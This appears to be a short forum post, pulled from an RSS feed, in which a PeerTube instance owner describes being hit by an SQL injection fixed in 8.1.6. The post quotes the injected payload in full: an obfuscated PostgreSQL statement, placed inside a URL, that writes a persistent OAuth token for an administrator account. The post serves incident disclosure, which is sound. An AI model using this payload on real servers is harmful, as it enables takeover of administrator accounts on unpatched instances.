<![CDATA[Today's fun adventure with #peertube involves the #exploit fixed in 8.1.6.]]>Today's fun adventure with involves the fixed in 8.1.6. This one has an SQL injection hole. Looks like they got into mine, but apparently nothing was done to it yet. If you're curious, here's what the exploit pushed in the actor table:

http://20.240.202.159:8777/x');DO/**/$f$/**/DECLARE/**/uid/**/INT;/**/cid/**/INT;/**/BEGIN/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('user')||'/**/WHERE/**/role=0/**/LIMIT/**/1'/**/INTO/**/uid;/**/EXECUTE/**/'SELECT/**/id/**/FROM/**/'||quote_ident('oAuthClient')||'/**/LIMIT/**/1'/**/INTO/**/cid;/**/EXECUTE/**/'INSERT/**/INTO/**/'||quote_ident('oAuthToken')||'('||quote_ident('accessToken')||','||quote_ident('refreshToken')||','||quote_ident('accessTokenExpiresAt')||','||quote_ident('refreshTokenExpiresAt')||','||quote_ident('userId')||','||quote_ident('oAuthClientId')||','||quote_ident('createdAt')||','||quote_ident('updatedAt')||')/**/VALUES('||quote_literal('pt_audit_3e8b97f2a914')||','||quote_literal('refresh_pt_audit_3e8b97f2a914')||','||quote_literal('2030-01-01')||','||quote_literal('2030-01-01')||','||uid||','||cid||',NOW(),NOW())';/**/END/**/$f$;--

So this worked because they had a ' after the URL.

]]>https://board.circlewithadot.net/topic/13f9b286-d00d-44e1-94fd-3832de4927ae/today-s-fun-adventure-with-peertube-involves-the-exploit-fixed-in-8.1.6.RSS for NodeMon, 25 May 2026 06:29:17 GMTSat, 23 May 2026 09:53:08 GMT60